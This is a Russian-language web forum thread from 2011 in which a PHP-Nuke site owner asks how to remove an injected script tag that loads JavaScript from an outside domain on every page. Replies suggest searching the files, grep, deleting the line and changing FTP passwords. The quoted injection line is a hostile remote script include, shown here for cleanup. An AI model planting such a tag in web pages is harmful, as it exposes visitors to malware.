Мне на сайт вирус сунули ,скрипт и из за него сайт грузится пол дня,зашёл на главную страницу своего сайта и нажал посмотреть исходный код страницы :
<!-- --><script src="http://microsprogram.com/editpage.js"></script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Самый лучший сайт! </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
<META HTTP-EQUIV="EXPIRES" CONTENT="0">
<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
<META NAME="DISTRIBUTION" CONTENT="GLOBAL">
<META NAME="AUTHOR" CONTENT="Самый лучший сайт!">
<META NAME="COPYRIGHT" CONTENT="Copyright © by Самый лучший сайт!">
<META NAME="KEYWORDS" CONTENT="News, news, New, new, Technology,
Вот этот скрипт <!-- --><script src="http://microsprogram.com/editpage.js"></script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
Как мне его удалить? Где он находится,в каком файле или папке?Весь сайт уже перелопатил))) Помогите пожалуйста!
Спустя 2 минуты, 43 секунды (12.08.2011 - 16:39) imbalance_hero написал(а):
Откуда мы знаем, как ты создавал свой сайт, и где у тебя содержится первая страница и на каком движке создан сайт? 
Открываешь папку сайта, и делаешь поиск внутри файлов, туда вводишь данную строчку, должен найти быстро
Открываешь папку сайта, и делаешь поиск внутри файлов, туда вводишь данную строчку, должен найти быстро
Спустя 4 секунды (12.08.2011 - 16:39) Winston написал(а):
| Цитата (vitalxz @ 12.08.2011 - 16:37) |
| де он находится,в каком файле или папке? |
Сделать поиск по содержанию, например notepad++ умеет это делать.
| Цитата (vitalxz @ 12.08.2011 - 16:37) |
| Как мне его удалить |
Найти код, удалить вручную + поменять пароли доступа к ftp
Спустя 1 минута, 53 секунды (12.08.2011 - 16:41) vitalxz написал(а):
php Nuke у меня стоит ,а этот вирус везде,любую страницу откроешь,он впереди на лихом коне(((
Спустя 52 секунды (12.08.2011 - 16:42) vitalxz написал(а):
Откуда мы знаем, как ты создавал свой сайт, и где у тебя содержится первая страница и на каком движке создан сайт? smile.gif
Открываешь папку сайта, и делаешь поиск внутри файлов, туда вводишь данную строчку, должен найти быстро smile.gif
Да делал я так,не нашёл ничего(((
Открываешь папку сайта, и делаешь поиск внутри файлов, туда вводишь данную строчку, должен найти быстро smile.gif
Да делал я так,не нашёл ничего(((
Спустя 1 минута, 45 секунд (12.08.2011 - 16:44) imbalance_hero написал(а):
vitalxz
Ну если везде - надо всё чистить! Просто удаляешь из исходного кода данную строчку и перезаливаешь на сервер.
Ну если везде - надо всё чистить! Просто удаляешь из исходного кода данную строчку и перезаливаешь на сервер.
Спустя 3 минуты, 4 секунды (12.08.2011 - 16:47) vitalxz написал(а):
| Цитата (imbalance_hero @ 12.08.2011 - 13:44) |
| vitalxz Ну если везде - надо всё чистить! Просто удаляешь из исходного кода данную строчку и перезаливаешь на сервер. |
Так вот в этом и загвоздка
Где этот исходный код????? Спустя 49 секунд (12.08.2011 - 16:48) YVSIK написал(а):
так первое офомить код свой ВВ тегами
на-до-бы добавить хостера видимо это будет на бесплатном хосте
было подобное ) хостеры для того чтоб окупить свои затраты цепляют в конце каждого файла как рекламу и ещё как нибудь
таретье если это так, то пробовать надо через файл .htaccess
чтоб он отрезал, если страницы нет, то перебрасывал не на рекламу хостера
а на ошибочную страницу
как это делается надо смотреть тут
на-до-бы добавить хостера видимо это будет на бесплатном хосте
было подобное ) хостеры для того чтоб окупить свои затраты цепляют в конце каждого файла как рекламу и ещё как нибудь
таретье если это так, то пробовать надо через файл .htaccess
чтоб он отрезал, если страницы нет, то перебрасывал не на рекламу хостера
а на ошибочную страницу
как это делается надо смотреть тут
| Цитата |
| Options -Indexes Эта строка запретит вывод списка файлов и директорий, если в папке не окажется индекса. А директива ErrorDocument перенаправляет запросы на подготовленные страницы в случае ошибки сервера. Допустим набран адрес несуществующей страницы. В таком случае откроется 404.html |
Спустя 34 секунды (12.08.2011 - 16:48) ApuktaChehov написал(а):
vitalxz - вы сайт сами делали? Если да, то вопросов вообще не должно быть. Если нет и вы не знаете как он работает, то уж тут точно никто ничего не скажет. Нужно смотреть на исходные коды сайта. Иначе почти нереально помочь.
Спустя 37 секунд (12.08.2011 - 16:49) Invis1ble написал(а):
vitalxz
| Цитата |
| Да делал я так,не нашёл ничего((( |
плохо искал значит, чудес не бывает
Спустя 4 минуты, 33 секунды (12.08.2011 - 16:54) vitalxz написал(а):
Друзья,может есть желающий помочь мне? 
А то я деревяннее дуба 
Но всё равно всем спасибо кто откликнулся.
А то я деревяннее дуба Но всё равно всем спасибо кто откликнулся.
Спустя 3 минуты, 38 секунд (12.08.2011 - 16:57) imbalance_hero написал(а):
vitalxz
Не хочу показаться нахалом, но у нас на форуме трепятся языком все, а если работать - то работа за деньги
Не хочу показаться нахалом, но у нас на форуме трепятся языком все, а если работать - то работа за деньги
Спустя 1 минута, 14 секунд (12.08.2011 - 16:58) vitalxz написал(а):
Ну так никто и не сомневался)))
Спустя 3 минуты, 11 секунд (12.08.2011 - 17:02) Invis1ble написал(а):
vitalxz
1. берешь устанавливаешь какую-нибудь IDE с поддержкой php и создаешь проект из исходников
2. находишь в ней фичу типа "поиск по всем файлам проекта"
3. вбиваешь в строку поиска "<script" и нажимаешь "искать"
4. втыкаешь нное кол-во времени в результаты поиска и проверяешь все подозрительные места в коде
1. берешь устанавливаешь какую-нибудь IDE с поддержкой php и создаешь проект из исходников
2. находишь в ней фичу типа "поиск по всем файлам проекта"
3. вбиваешь в строку поиска "<script" и нажимаешь "искать"
4. втыкаешь нное кол-во времени в результаты поиска и проверяешь все подозрительные места в коде
Спустя 2 минуты, 55 секунд (12.08.2011 - 17:04) YVSIK написал(а):
пиши в личку там посмотрим и не забуть указать хостера
и статус сайта когда начал работать
как работал сколько времени работал когда это появилось
тут на форуме скажи насколько это критично в мысле если зайти сейчас на сайт
что вирус прилетит или нет
и статус сайта когда начал работать
как работал сколько времени работал когда это появилось
тут на форуме скажи насколько это критично в мысле если зайти сейчас на сайт
что вирус прилетит или нет
Спустя 2 минуты, 11 секунд (12.08.2011 - 17:07) Invis1ble написал(а):
либо же вариант попроще (для линуксоидов)
терминал
и изучаешь лог вывода
терминал
$ grep -iRnH '<script' /path/to/dir/*
и изучаешь лог вывода